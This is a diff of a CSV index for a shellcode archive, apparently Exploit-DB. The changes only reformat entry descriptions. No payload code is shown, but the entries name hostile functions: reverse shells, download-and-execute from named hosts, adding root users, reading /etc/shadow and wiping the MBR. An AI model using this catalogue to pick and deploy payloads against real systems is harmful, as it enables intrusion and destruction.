 13409,shellcodes/linux_x86/13409.c,"Linux/x86 - execve(/bin/sh) + Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,shellcode,linux_x86
 13410,shellcodes/linux_x86/13410.s,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (2)",2005-09-09,xort,shellcode,linux_x86
 13411,shellcodes/linux_x86/13411.c,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1)",2005-09-08,xort,shellcode,linux_x86
-13412,shellcodes/linux_x86/13412.c,"Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,shellcode,linux_x86
-13413,shellcodes/linux_x86/13413.c,"Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,shellcode,linux_x86
-13414,shellcodes/linux_x86/13414.c,"Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,shellcode,linux_x86
+13412,shellcodes/linux_x86/13412.c,"Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,shellcode,linux_x86
+13413,shellcodes/linux_x86/13413.c,"Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,shellcode,linux_x86
+13414,shellcodes/linux_x86/13414.c,"Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,shellcode,linux_x86
 13415,shellcodes/linux_x86/13415.c,"Linux/x86 - Break chroot (../ 20x Loop) + execve(/bin/sh) Shellcode (66 bytes)",2005-07-11,Okti,shellcode,linux_x86
 13416,shellcodes/linux_x86/13416.txt,"Linux/x86 - upload + exec Shellcode (189 bytes)",2005-06-19,cybertronic,shellcode,linux_x86
 13417,shellcodes/linux_x86/13417.c,"Linux/x86 - setreuid() + execve() Shellcode (31 bytes)",2004-12-26,oc192,shellcode,linux_x86
 13418,shellcodes/linux_x86/13418.c,"Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes)",2004-12-22,xort,shellcode,linux_x86
-13419,shellcodes/linux_x86/13419.c,"Linux/x86 - Alphanumeric Encoded (IMUL Method) Shellcode (88 bytes)",2004-12-22,xort,shellcode,linux_x86
+13419,shellcodes/linux_x86/13419.c,"Linux/x86 - Alphanumeric Encoded + IMUL Method Shellcode (88 bytes)",2004-12-22,xort,shellcode,linux_x86
 13420,shellcodes/linux_x86/13420.c,"Linux/x86 - Self-Modifying Radical Shellcode (70 bytes)",2004-12-22,xort,shellcode,linux_x86
 13421,shellcodes/linux_x86/13421.c,"Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)",2004-12-22,xort,shellcode,linux_x86
 13422,shellcodes/linux_x86/13422.c,"Linux/x86 - execve() Shellcode (23 bytes)",2004-11-15,marcetam,shellcode,linux_x86
 13423,shellcodes/linux_x86/13423.c,"Linux/x86 - execve(_/bin/ash__0_0) Shellcode (21 bytes)",2004-11-15,zasta,shellcode,linux_x86
 13424,shellcodes/linux_x86/13424.txt,"Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,linux_x86
-13425,shellcodes/linux_x86/13425.c,"Linux/IA32 - execve(/bin/sh) 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,linux_x86
+13425,shellcodes/linux_x86/13425.c,"Linux/IA32 - execve(/bin/sh) + 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,linux_x86
 13426,shellcodes/bsd_x86/13426.c,"BSD/x86 - symlink /bin/sh + XORing Encoded Shellcode (56 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
 13427,shellcodes/linux_x86/13427.c,"Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,linux_x86
 13428,shellcodes/linux_x86/13428.c,"Linux/x86 - Add Root User (t00r) To /etc/passwd + Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
@@ -190,7 +190,7 @@ id,file,description,date,author,type,platform
 13432,shellcodes/linux_x86/13432.c,"Linux/x86 - Execute At Shared Memory Shellcode (50 bytes)",2004-09-26,sloth,shellcode,linux_x86
 13433,shellcodes/linux_x86/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)",2004-09-26,UnboundeD,shellcode,linux_x86
 13434,shellcodes/linux_x86/13434.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes)",2004-09-26,dev0id,shellcode,linux_x86
-13435,shellcodes/linux_x86/13435.c,"Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)",2004-09-26,hts,shellcode,linux_x86
+13435,shellcodes/linux_x86/13435.c,"Linux/x86 - Reverse TCP (200.182.207.235/TCP) Telnet Shel Shellcode (134 bytes)",2004-09-26,hts,shellcode,linux_x86
 13436,shellcodes/linux_x86/13436.c,"Linux/x86 - Reverse TCP Shell (/bin/sh) Shellcode (120 bytes)",2004-09-26,lamagra,shellcode,linux_x86
 13437,shellcodes/linux_x86/13437.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
 13438,shellcodes/linux_x86/13438.c,"Linux/x86 - cp /bin/sh /tmp/katy + chmod 4555 katy Shellcode (126 bytes)",2004-09-26,RaiSe,shellcode,linux_x86
@@ -212,10 +212,10 @@ id,file,description,date,author,type,platform
 13453,shellcodes/bsd_x86/13453.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (46 bytes)",2004-09-12,dev0id,shellcode,bsd_x86
 13454,shellcodes/linux_x86/13454.c,"Linux/x86 - Break chroot + execve(/bin/sh) Shellcode (80 bytes)",2004-09-12,preedator,shellcode,linux_x86
 13455,shellcodes/linux_x86/13455.c,"Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
-13456,shellcodes/linux_x86/13456.c,"Linux/x86 - execve(/bin/sh) XOR Encoded Shellcode (55 bytes)",2004-09-12,anonymous,shellcode,linux_x86
-13457,shellcodes/linux_x86/13457.c,"Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (41 bytes)",2004-09-12,anonymous,shellcode,linux_x86
+13456,shellcodes/linux_x86/13456.c,"Linux/x86 - execve(/bin/sh) + XOR Encoded Shellcode (55 bytes)",2004-09-12,anonymous,shellcode,linux_x86
+13457,shellcodes/linux_x86/13457.c,"Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (41 bytes)",2004-09-12,anonymous,shellcode,linux_x86
 13458,shellcodes/linux_x86/13458.c,"Linux/x86 - setreuid(0_0) + execve(/bin/sh) Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",shellcode,linux_x86
-13460,shellcodes/linux_x86/13460.c,"Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,linux_x86
+13460,shellcodes/linux_x86/13460.c,"Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,linux_x86
 13461,shellcodes/linux_x86/13461.c,"Linux/x86 - Add Root User (z) To /etc/passwd Shellcode (70 bytes)",2000-08-07,anonymous,shellcode,linux_x86
 13462,shellcodes/linux_x86/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve(/bin/sh) Shellcode (132 bytes)",2000-08-07,anonymous,shellcode,linux_x86
 13463,shellcodes/linux_x86-64/13463.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,linux_x86-64
@@ -238,118 +238,118 @@ id,file,description,date,author,type,platform
 13480,shellcodes/osx_ppc/13480.c,"OSX/PPC - Add Root User (r00t) Shellcode (219 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
 13481,shellcodes/osx_ppc/13481.c,"OSX/PPC - execve(/bin/sh) Shellcode (72 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
 13482,shellcodes/osx_ppc/13482.c,"OSX/PPC - Add inetd (/etc/inetd.conf) Backdoor (Bind 6969/TCP Shell) Shellcode (222 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
-13483,shellcodes/osx_ppc/13483.c,"OSX/PPC - Reboot Shellcode (28 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
+13483,shellcodes/osx_ppc/13483.c,"OSX/PPC - Reboot() Shellcode (28 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
 13484,shellcodes/osx_ppc/13484.c,"OSX/PPC - setuid(0) + execve(/bin/sh) Shellcode (88 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
 13485,shellcodes/osx_ppc/13485.c,"OSX/PPC - Create /tmp/suid Shellcode (122 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
 13486,shellcodes/osx_ppc/13486.c,"OSX/PPC - Simple write() Shellcode (75 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
 13487,shellcodes/osx_ppc/13487.c,"OSX/PPC - execve(/usr/X11R6/bin/xterm) Shellcode (141 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
 13488,shellcodes/sco_x86/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL) Shellcode (43 bytes)",2005-11-30,"p. minervini",shellcode,sco_x86
-13489,shellcodes/solaris_mips/13489.c,"Solaris/MIPS - Download (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,shellcode,solaris_mips
-13490,shellcodes/solaris_sparc/13490.c,"Solaris/SPARC - setreuid + Executes Command Shellcode (92+ bytes)",2006-10-21,bunker,shellcode,solaris_sparc
+13489,shellcodes/solaris_mips/13489.c,"Solaris/MIPS - Download File (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,shellcode,solaris_mips
+13490,shellcodes/solaris_sparc/13490.c,"Solaris/SPARC - setreuid() + Executes Command Shellcode (92+ bytes)",2006-10-21,bunker,shellcode,solaris_sparc
 13491,shellcodes/generator/13491.c,"Solaris/MIPS - Reverse TCP (10.0.0.3:44434/TCP) Shell + XNOR Encoded Traffic Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator
-13492,shellcodes/solaris_sparc/13492.c,"Solaris/SPARC - setreuid + execve() Shellcode (56 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
+13492,shellcodes/solaris_sparc/13492.c,"Solaris/SPARC - setreuid() + execve() Shellcode (56 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
 13493,shellcodes/solaris_sparc/13493.c,"Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
 13494,shellcodes/solaris_sparc/13494.txt,"Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,shellcode,solaris_sparc
 13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc
 13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc
 13497,shellcodes/solaris_sparc/13497.txt,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,shellcode,solaris_sparc
 13498,shellcodes/generator/13498.php,"Solaris/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-16,"Jonathan Salwan",shellcode,generator
-13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86
+13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) + Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86
 13500,shellcodes/solaris_x86/13500.c,"Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes)",2008-12-02,sm4x,shellcode,solaris_x86
 13501,shellcodes/solaris_x86/13501.txt,"Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
 13502,shellcodes/solaris_x86/13502.txt,"Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
 13503,shellcodes/unixware/13503.txt,"UnixWare - execve(/bin/sh) Shellcode (95 bytes)",2004-09-26,K2,shellcode,unixware
-13504,shellcodes/windows_x86/13504.asm,"Windows 5.0 < 7.0 x86 - Bind TCP (28876/TCP) Shell + Null-Free Shellcode",2009-07-27,Skylined,shellcode,windows_x86
-13505,shellcodes/windows_x86/13505.c,"Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,shellcode,windows_x86
-13507,shellcodes/windows_x86/13507.txt,"Windows x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,shellcode,windows_x86
-13508,shellcodes/windows_x86/13508.asm,"Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,shellcode,windows_x86
-13509,shellcodes/windows_x86/13509.c,"Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes)",2009-02-24,Koshi,shellcode,windows_x86
-13510,shellcodes/windows_x86/13510.c,"Windows XP SP2 x86 (French) - cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,shellcode,windows_x86
-13511,shellcodes/windows_x86/13511.c,"Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,shellcode,windows_x86
-13512,shellcodes/windows_x86/13512.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,shellcode,windows_x86
-13513,shellcodes/windows_x86/13513.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes)",2008-09-03,Koshi,shellcode,windows_x86
-13514,shellcodes/windows_x86/13514.asm,"Windows x86 - Reverse Connection + Download A File + Save + Execute Shellcode",2008-08-25,loco,shellcode,windows_x86
-13515,shellcodes/generator/13515.pl,"Windows x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)",2008-03-14,"YAG KOHHA",shellcode,generator
-13516,shellcodes/windows_x86/13516.asm,"Windows x86 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,shellcode,windows_x86
-13517,shellcodes/windows_x86/13517.asm,"Windows x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)",2007-06-14,Weiss,shellcode,windows_x86
-13518,shellcodes/windows_x86/13518.c,"Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes)",2007-05-31,ex-pb,shellcode,windows_x86
-13519,shellcodes/windows_x86/13519.c,"Windows SP1/SP2 x86 - Beep Shellcode (35 bytes)",2006-04-14,xnull,shellcode,windows_x86
-13520,shellcodes/windows_x86/13520.c,"Windows XP SP2 x86 - MessageBox Shellcode (110 bytes)",2006-01-24,Omega7,shellcode,windows_x86
-13521,shellcodes/windows_x86/13521.asm,"Windows x86 - Command WinExec() Shellcode (104+ bytes)",2006-01-24,Weiss,shellcode,windows_x86
-13522,shellcodes/windows_x86/13522.c,"Windows x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)",2005-12-23,darkeagle,shellcode,windows_x86
-13523,shellcodes/windows_x86/13523.c,"Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)",2005-10-28,darkeagle,shellcode,windows_x86
-13524,shellcodes/windows_x86/13524.txt,"Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes)",2005-08-16,"Matthieu Suiche",shellcode,windows_x86
-13525,shellcodes/windows_x86/13525.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)",2005-07-26,loco,shellcode,windows_x86
-13526,shellcodes/windows_x86/13526.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)",2005-01-26,twoci,shellcode,windows_x86
-13527,shellcodes/windows_x86/13527.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)",2005-01-09,oc192,shellcode,windows_x86
-13528,shellcodes/generator/13528.c,"Windows XP/2000/2003 - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)",2004-10-25,lion,shellcode,generator
-13529,shellcodes/windows_x86/13529.c,"Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)",2004-10-25,lion,shellcode,windows_x86
-13530,shellcodes/windows_x86/13530.asm,"Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",shellcode,windows_x86
-13531,shellcodes/windows_x86/13531.c,"Windows XP SP1 - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)",2004-09-26,silicon,shellcode,windows_x86
+13504,shellcodes/windows_x86/13504.asm,"Windows/x86 (5.0 < 7.0) - Bind TCP (28876/TCP) Shell + Null-Free Shellcode",2009-07-27,Skylined,shellcode,windows_x86
+13505,shellcodes/windows_x86/13505.c,"Windows/x86 (XP SP2) (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,shellcode,windows_x86
+13507,shellcodes/windows_x86/13507.txt,"Windows/x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,shellcode,windows_x86
+13508,shellcodes/windows_x86/13508.asm,"Windows/x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,shellcode,windows_x86
+13509,shellcodes/windows_x86/13509.c,"Windows/x86 - PEB!NtGlobalFlags Shellcode (14 bytes)",2009-02-24,Koshi,shellcode,windows_x86
+13510,shellcodes/windows_x86/13510.c,"Windows/x86 (XP SP2)  (French) - cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,shellcode,windows_x86
+13511,shellcodes/windows_x86/13511.c,"Windows/x86 (XP SP2) - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,shellcode,windows_x86
+13512,shellcodes/windows_x86/13512.c,"Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,shellcode,windows_x86
+13513,shellcodes/windows_x86/13513.c,"Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + ASCII Printable Shellcode (49 bytes)",2008-09-03,Koshi,shellcode,windows_x86
+13514,shellcodes/windows_x86/13514.asm,"Windows/x86 - Reverse Connection + Download A File + Save + Execute Shellcode",2008-08-25,loco,shellcode,windows_x86
+13515,shellcodes/generator/13515.pl,"Windows/x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)",2008-03-14,"YAG KOHHA",shellcode,generator
+13516,shellcodes/windows_x86/13516.asm,"Windows/x86 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,shellcode,windows_x86
+13517,shellcodes/windows_x86/13517.asm,"Windows/x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)",2007-06-14,Weiss,shellcode,windows_x86
+13518,shellcodes/windows_x86/13518.c,"Windows/x86 (NT/XP) - IsDebuggerPresent Shellcode (39 bytes)",2007-05-31,ex-pb,shellcode,windows_x86
+13519,shellcodes/windows_x86/13519.c,"Windows/x86 (SP1/SP2) - Beep Shellcode (35 bytes)",2006-04-14,xnull,shellcode,windows_x86
+13520,shellcodes/windows_x86/13520.c,"Windows/x86 (XP SP2) - MessageBox Shellcode (110 bytes)",2006-01-24,Omega7,shellcode,windows_x86
+13521,shellcodes/windows_x86/13521.asm,"Windows/x86 - Command WinExec() Shellcode (104+ bytes)",2006-01-24,Weiss,shellcode,windows_x86
+13522,shellcodes/windows_x86/13522.c,"Windows/x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)",2005-12-23,darkeagle,shellcode,windows_x86
+13523,shellcodes/windows_x86/13523.c,"Windows (NT/2000/XP) (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)",2005-10-28,darkeagle,shellcode,windows_x86
+13524,shellcodes/windows_x86/13524.txt,"Windows (9x/NT/2000/XP) - Reverse Generic Without Loader (192.168.1.11:4919) Shellcode (249 bytes)",2005-08-16,"Matthieu Suiche",shellcode,windows_x86
+13525,shellcodes/windows_x86/13525.c,"Windows  (9x/NT/2000/XP) - PEB method Shellcode (29 bytes)",2005-07-26,loco,shellcode,windows_x86
+13526,shellcodes/windows_x86/13526.c,"Windows  (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)",2005-01-26,twoci,shellcode,windows_x86
+13527,shellcodes/windows_x86/13527.c,"Windows (9x/NT/2000/XP) - PEB method Shellcode (35 bytes)",2005-01-09,oc192,shellcode,windows_x86
+13528,shellcodes/generator/13528.c,"Windows (XP/2000/2003) - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)",2004-10-25,lion,shellcode,generator
+13529,shellcodes/windows_x86/13529.c,"Windows (XP/2000/2003) - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)",2004-10-25,lion,shellcode,windows_x86
+13530,shellcodes/windows_x86/13530.asm,"Windows (XP) - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) + Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",shellcode,windows_x86
+13531,shellcodes/windows_x86/13531.c,"Windows (XP SP1) - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)",2004-09-26,silicon,shellcode,windows_x86
 13532,shellcodes/windows_x86/13532.asm,"Windows - DCOM RPC2 Universal Shellcode",2003-10-09,anonymous,shellcode,windows_x86
-13533,shellcodes/windows_x86-64/13533.asm,"Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,shellcode,windows_x86-64
+13533,shellcodes/windows_x86-64/13533.asm,"Windows/x86-64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,shellcode,windows_x86-64
 13548,shellcodes/linux_x86/13548.asm,"Linux/x86 - Kill All Processes Shellcode (9 bytes)",2010-01-14,root@thegibson,shellcode,linux_x86
-13549,shellcodes/linux_x86/13549.c,"Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)",2009-12-04,ka0x,shellcode,linux_x86
+13549,shellcodes/linux_x86/13549.c,"Linux/x86 - setuid(0) + execve(/sbin/poweroff -f) Shellcode (47 bytes)",2009-12-04,ka0x,shellcode,linux_x86
 13550,shellcodes/linux_x86/13550.c,"Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,shellcode,linux_x86
 13551,shellcodes/linux_x86/13551.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes)",2009-12-04,ka0x,shellcode,linux_x86
 13553,shellcodes/linux_x86/13553.c,"Linux/x86 - execve() Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",shellcode,linux_x86
-13560,shellcodes/windows/13560.txt,"Windows XP SP2 - PEB ISbeingdebugged Beep Shellcode (56 bytes)",2009-12-14,anonymous,shellcode,windows
+13560,shellcodes/windows/13560.txt,"Windows (XP SP2) - PEB ISbeingdebugged Beep Shellcode (56 bytes)",2009-12-14,anonymous,shellcode,windows
 13563,shellcodes/linux_x86/13563.asm,"Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,shellcode,linux_x86
-13565,shellcodes/windows_x86/13565.asm,"Windows XP SP3 x86 - ShellExecuteA Shellcode",2009-12-19,sinn3r,shellcode,windows_x86
-13566,shellcodes/linux_x86/13566.c,"Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,shellcode,linux_x86
-13569,shellcodes/windows_x86/13569.asm,"Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode",2009-12-24,sinn3r,shellcode,windows_x86
+13565,shellcodes/windows_x86/13565.asm,"Windows/x86 (XP SP3) - ShellExecuteA Shellcode",2009-12-19,sinn3r,shellcode,windows_x86
+13566,shellcodes/linux_x86/13566.c,"Linux/x86 - setreuid(0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,shellcode,linux_x86
+13569,shellcodes/windows_x86/13569.asm,"Windows/x86 (XP SP3) - Add Firewall Rule (Allow 445/TCP) Shellcode",2009-12-24,sinn3r,shellcode,windows_x86
 13570,shellcodes/freebsd_x86/13570.c,"FreeBSD/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes)",2009-12-24,sbz,shellcode,freebsd_x86
-13571,shellcodes/windows_x86/13571.c,"Windows XP SP2 x86 - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,shellcode,windows_x86
+13571,shellcodes/windows_x86/13571.c,"Windows/x86 (XP SP2) - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,shellcode,windows_x86
 13572,shellcodes/linux_x86/13572.c,"Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)",2009-12-24,$andman,shellcode,linux_x86
-13574,shellcodes/windows_x86/13574.c,"Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,windows_x86
+13574,shellcodes/windows_x86/13574.c,"Windows/x86 (XP SP2)  (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,windows_x86
 13576,shellcodes/linux_x86/13576.asm,"Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)",2010-01-16,root@thegibson,shellcode,linux_x86
 13577,shellcodes/linux_x86/13577.txt,"Linux/x86 - setuid() + Break chroot (mkdir/chdir/chroot '...') + execve(/bin/sh) Shellcode (79 bytes)",2009-12-30,root@thegibson,shellcode,linux_x86
 13578,shellcodes/linux_x86/13578.txt,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)",2009-12-30,root@thegibson,shellcode,linux_x86
 13579,shellcodes/linux_x86/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + No password + exit() Shellcode (107 bytes)",2009-12-31,$andman,shellcode,linux_x86
-13581,shellcodes/windows/13581.txt,"Windows XP Professional SP2 (English) - MessageBox Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,shellcode,windows
-13582,shellcodes/windows/13582.txt,"Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,shellcode,windows
+13581,shellcodes/windows/13581.txt,"Windows  (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,shellcode,windows
+13582,shellcodes/windows/13582.txt,"Windows  (XP Professional SP2) (English) - Wordpad + Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,shellcode,windows
 13586,shellcodes/linux_x86/13586.txt,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,shellcode,linux_x86
-13595,shellcodes/windows_x86/13595.c,"Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,shellcode,windows_x86
+13595,shellcodes/windows_x86/13595.c,"Windows/x86 (XP SP2)  (French) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,shellcode,windows_x86
 13599,shellcodes/linux_x86/13599.txt,"Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
 13600,shellcodes/linux_x86/13600.txt,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
 13601,shellcodes/linux_x86/13601.txt,"Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
 13602,shellcodes/linux_x86/13602.txt,"Linux/i686 - pacman -R <package> Shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
 13609,shellcodes/linux_x86/13609.c,"Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (43 bytes)",2010-02-09,fb1h2s,shellcode,linux_x86
-13614,shellcodes/windows_x86/13614.c,"Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86
-13615,shellcodes/windows_x86/13615.c,"Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86
+13614,shellcodes/windows_x86/13614.c,"Windows/x86 (XP SP3)  (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86
